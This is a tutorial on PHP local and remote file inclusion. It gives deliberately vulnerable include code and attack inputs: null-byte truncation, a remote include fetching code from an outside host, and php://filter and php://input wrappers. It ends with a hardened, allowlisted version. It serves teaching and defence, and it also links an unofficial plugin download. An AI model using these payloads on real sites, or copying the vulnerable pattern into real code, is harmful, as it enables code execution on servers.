# Local and Remote File Inclusion

Common file inclusion functions: `include()`, `require()`, `include_once()`, `require_once()`.

**Local inclusion**

Request `http://localhost/test/ddd.php?file=1.txt`:

```php
<?php
// ddd.php
// Deliberately vulnerable: the request parameter is passed to include unchanged.
if (isset($_GET['file'])) {
    $file = $_GET['file'];
    include $file;
}
```

```php
<?php
// 1.txt
phpinfo();
?>
```

Or, if the code is `include $file.".php";`, a `%00` truncation is needed.

Request `http://localhost/test/ddd.php?file=1.txt%00`:

```php
<?php
// ddd.php
// Deliberately vulnerable: a fixed ".php" suffix is appended to the request parameter.
if (isset($_GET['file'])) {
    $file = $_GET['file'];
    include $file . ".php";
}
```

```php
<?php
// 1.txt
phpinfo();
?>
```

**Remote inclusion:**

Settings that must be enabled: `allow_url_fopen` and `allow_url_include` set to On, with PHP version >= 5.2.0.

- [allow\_url\_fopen='1'](https://www.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen): when On, this option activates the URL-aware fopen wrappers, so that URL objects can be accessed like files.
- [allow\_url\_include='0'](https://www.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include): when On, this option allows URL objects to be included. Added in 5.2, removed in 7.4.

```
// Append a question mark at the end
Request: http://localhost/test/ddd.php?file=www.elseweb.com/1.txt?
```

Pseudo-protocols:

1. `php://filter/read=convert.base64-encode/resource=` with `allow_url_include = On` and PHP >= 5.2.0
2. `php://input`

We need a browser plugin called HackBar. The new version is paid, so we can use the [old version](https://pan.baidu.com/s/1gz4IyxjuITk_OkWwnDw30Q) from this link instead.

Once it is installed, press F12 and select it in the developer console to use it.

![](https://img.kancloud.cn/b9/47/b947706e5d89213f557391e3c0413ff5_546x191.png)

Click Execute to run.
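A hardened counterpart to the vulnerable `ddd.php` above, added here as an example and not code from the original page: the request value is treated as a page name, checked against a character allowlist, and resolved under a fixed directory. The `pages/` directory, the `resolve_page()` helper and the sample inputs are assumptions made for this example.

```php
<?php
declare(strict_types=1);

// Hardened counterpart to ddd.php. PAGE_DIR is an assumed layout: the only
// files meant to be included live in ./pages/ beside this script.
const PAGE_DIR = __DIR__ . '/pages';

// Map a request value to a real file under $baseDir, or null if rejected.
function resolve_page(string $name, string $baseDir = PAGE_DIR): ?string
{
    // Allowlist of characters: no dot, slash, colon or NUL byte, so "1.txt",
    // "1.txt%00", URL values and "php://..." wrappers are all rejected here.
    if (preg_match('/\A[a-z0-9_-]{1,64}\z/', $name) !== 1) {
        return null;
    }
    // The application, not the request, supplies directory and extension.
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $name . '.php');
    if ($base === false || $real === false) {
        return null; // no such page
    }
    // After symlink resolution the file must still sit inside the base dir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

if (PHP_SAPI === 'cli') {
    // Offline self-check against a constructed page directory.
    $dir = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . '/home.php', "<?php echo 'home';\n");
    $samples = ['home', '1.txt', "1.txt\0", 'www.elseweb.com/1.txt?',
                'php://input',
                'php://filter/read=convert.base64-encode/resource=ddd'];
    foreach ($samples as $s) {
        $ok = resolve_page($s, $dir) !== null;
        printf("%-60s %s\n", json_encode($s), $ok ? 'ALLOW' : 'REJECT');
    }
    unlink($dir . '/home.php');
    rmdir($dir);
} else {
    $file = $_GET['file'] ?? null;
    $path = is_string($file) ? resolve_page($file) : null;
    if ($path === null) {
        http_response_code(404);
        exit('Not found');
    }
    include $path;
}
```

Run from the command line, only `home` is allowed and every request value shown on this page is rejected. Keeping `allow_url_include` at `Off` in `php.ini` closes the remote-include and `php://input` paths independently of this check.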